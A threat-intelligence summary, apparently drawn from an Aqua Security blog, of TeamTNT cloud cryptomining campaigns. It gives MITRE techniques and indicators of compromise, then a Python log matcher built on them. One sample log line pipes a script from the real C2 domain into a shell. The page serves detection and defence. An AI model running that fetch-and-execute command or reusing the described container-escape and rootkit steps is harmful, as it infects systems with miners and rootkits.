Threat Alert: New Malware in the Cloud By TeamTNT

The blog analyzes three recent honeypot infections attributed to TeamTNT, suggesting renewed activity after their 2021 farewell. It details multiple campaigns (Kangaroo, Cronb, What Will Be) that reuse familiar TeamTNT tools and techniques, including misconfigured cloud services, cryptomining, and container escape tactics, and notes a GitHub presence linked to TeamTNT. Hashtags: #TeamTNT #PollardsKangaroo #Diamorphine #Tsunami #Monero #Docker

Keypoints

  • Three distinct TeamTNT-like attacks were observed on honeypots in early September, indicating renewed activity.
  • The Kangaroo attack exploits a misconfigured Docker Daemon, deploys an Alpine container, and downloads a shell script from a C2 server.
  • The Cronb component reuses old techniques (rootkits, cron persistence, SSH/keys for lateral movement) and deploys Monero cryptomining while evading defenses.
  • The What Will Be attack leverages a Docker API release_agent vulnerability to escape the container and downloads additional scripts (en.sh) to optimize mining.
  • Campaign tooling includes Gentoo/Debian/Ubuntu package managers, DNS/name-server adjustments, and known TeamTNT scripts (k.sh, c.sh, d.sh, b.sh, s.sh) with multiple rootkits (Diamorphine, prochider).
  • GitHub activity under the account “wafferz” and references to a past TeamTNT server suggest ongoing or future operations; a CNAPP is recommended for cloud-native protection.

MITRE Techniques

  • [T1046] Network Service Scanning – Used to identify misconfigured Docker Daemon targets during the Kangaroo attack. Quote: “…scanning for a misconfigured Docker Daemon…”
  • [T1059.004] Unix Shell – Execution of shell scripts (k.sh, s.sh, c.sh, d.sh, b.sh) to install, download, and run payloads. Quote: “The file k.sh that was dropped and executed on the attacked server”
  • [T1105] Ingress Tool Transfer – Downloading and executing tools/scripts from C2 (k.sh, en.sh, etc.). Quote: “downloading and running further shell scripts”
  • [T1053.003] Cron – Use of cron-related scripts (cronb.sh, clean_cron, lock_cron) to gain persistence and manage tasks. Quote: “Deletes all cron scheduled jobs.”
  • [T1021.004] SSH – Lateral movement via SSH keys (Inserts SSH key to the host). Quote: “Inserts TeamTNT’s SSH key to the host.”
  • [T1014] Rootkit – Deployment of Diamorphine and Prochider rootkits to hide activity. Quote: “Diamorphine rootkit is deployed” and “Deploys prochider rootkit that hides itself.”
  • [T1562.001] Impair Defenses – Deleting logs and stopping/deleting security tools (SELinux, watchdog, GCP aegis, etc.). Quote: “Deletes history and stops and deletes security tools such as SElinux, watchdog, gcloud of GCP, and aegis of Alibaba cloud.”
  • [T1496] Resource Hijacking – Monero cryptomining and configuration deployment. Quote: “Downloading a Monero cryptominer and its configuration file and executing a cryptojacking attack.”

Indicators of Compromise

  • [IP Address] 93.95.229.203 – C2 host used in Kangaroo attack (domain: whatwill.be on this IP).
  • [IP Address] 205.185.118.246 – C2 host referenced by s.sh/dc.sh activities.
  • [Domain] whatwill.be – C2 domain referenced in Kangaroo attack (mapped to 93.95.229.203).
  • [File Hash] MD5 1ded4ed94ab31f1a3bba3a50cfa7238f – Hash associated with the Tsunami/syslog malware payload used in the campaigns.
  • [File Name] k.sh – Shell script dropped and executed on attacked servers (Kangaroo).
  • [File Name] s.sh – Supporting shell file used by multiple components.
  • [File Name] c.sh – Script designed to detect/attack exposed Redis servers.
  • [File Name] d.sh – Part of the Docker/cron-related attack chain; related to the en.sh/dc.sh flows.
  • [File Name] b.sh – Script identical to cronb.sh used in the Cron-based campaign.
  • [File Name] en.sh – Downloaded and run to optimize cryptomining (used in the dock1/dock2 flows).
  • [File Name] dc.sh – Shell file exploiting release_agent vulnerability for container escape.
  • [File Name] syslog – Tsunami malware component referenced as a potential dropper.
  • [Tool] zgrab, masscan, pnscan – Scanning utilities used by campaigns for discovery of targets.
  • [Account] wafferz – GitHub account linked to the Kangaroo/Dock project and indicators of TeamTNT activity.
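As an added defender-side example (not code from the Aqua blog), the indicators listed above turned into a small log triage matcher; the indicator values are the page's, while the regexes, the Hit type and the sample log lines are constructed here.

```python
import re
from dataclasses import dataclass

# Indicator values are those listed above; everything else here is constructed.
IOC_IPS = {"93.95.229.203", "205.185.118.246"}
IOC_DOMAINS = {"whatwill.be"}
IOC_MD5 = {"1ded4ed94ab31f1a3bba3a50cfa7238f"}
# "syslog" is omitted on purpose: as a bare file name it would match every host.
IOC_FILES = {"k.sh", "s.sh", "c.sh", "d.sh", "b.sh", "en.sh", "dc.sh", "cronb.sh"}
IOC_TOOLS = {"zgrab", "masscan", "pnscan"}

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
MD5_RE = re.compile(r"\b[0-9a-f]{32}\b")
# Script names must start a token ("open.sh" must not report "en.sh"); a '/' before is fine.
FILE_RE = re.compile(r"(?<![\w.])([A-Za-z_]+\.sh)\b")
DOMAIN_RE = re.compile(r"(?<![\w.-])(" + "|".join(map(re.escape, IOC_DOMAINS)) + r")\b")
TOOL_RE = re.compile(r"(?<![\w-])(" + "|".join(IOC_TOOLS) + r")\b")

@dataclass(frozen=True)
class Hit:
    line_no: int
    kind: str   # ip | domain | md5 | file | tool
    value: str

def scan_line(line_no: int, line: str) -> list:
    """Return every indicator from the report that appears in one log line."""
    hits = [Hit(line_no, "ip", v) for v in IP_RE.findall(line) if v in IOC_IPS]
    hits += [Hit(line_no, "domain", v) for v in DOMAIN_RE.findall(line)]
    hits += [Hit(line_no, "md5", v) for v in MD5_RE.findall(line.lower()) if v in IOC_MD5]
    hits += [Hit(line_no, "file", v) for v in FILE_RE.findall(line) if v in IOC_FILES]
    hits += [Hit(line_no, "tool", v) for v in TOOL_RE.findall(line)]
    return hits

def scan_lines(lines) -> list:
    # Scan a whole log, numbering lines from 1.
    return [h for n, line in enumerate(lines, 1) for h in scan_line(n, line)]

# Constructed sample lines for a dry run; not real captures.
SAMPLE_LOGS = [
    "dockerd: API request from 93.95.229.203: POST /containers/create image=alpine",
    "bash: curl -s http://whatwill.be/k.sh | sh",
    "md5sum: 1ded4ed94ab31f1a3bba3a50cfa7238f  /usr/bin/syslog",
    "CRON[2231]: (root) CMD (/tmp/cronb.sh)",
    "sshd: Accepted publickey for root from 10.0.0.5 port 51122",
    "apt: install masscan (1.3.2)",
]

if __name__ == "__main__":
    for h in scan_lines(SAMPLE_LOGS):
        print(f"line {h.line_no}: {h.kind} {h.value}")
```

A file-name match on its own is weak evidence (the names are short and generic), so treat file hits as pivots to confirm with the hash or the C2 network indicators.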

Read more: https://blog.aquasec.com/new-malware-in-the-cloud-by-teamtnt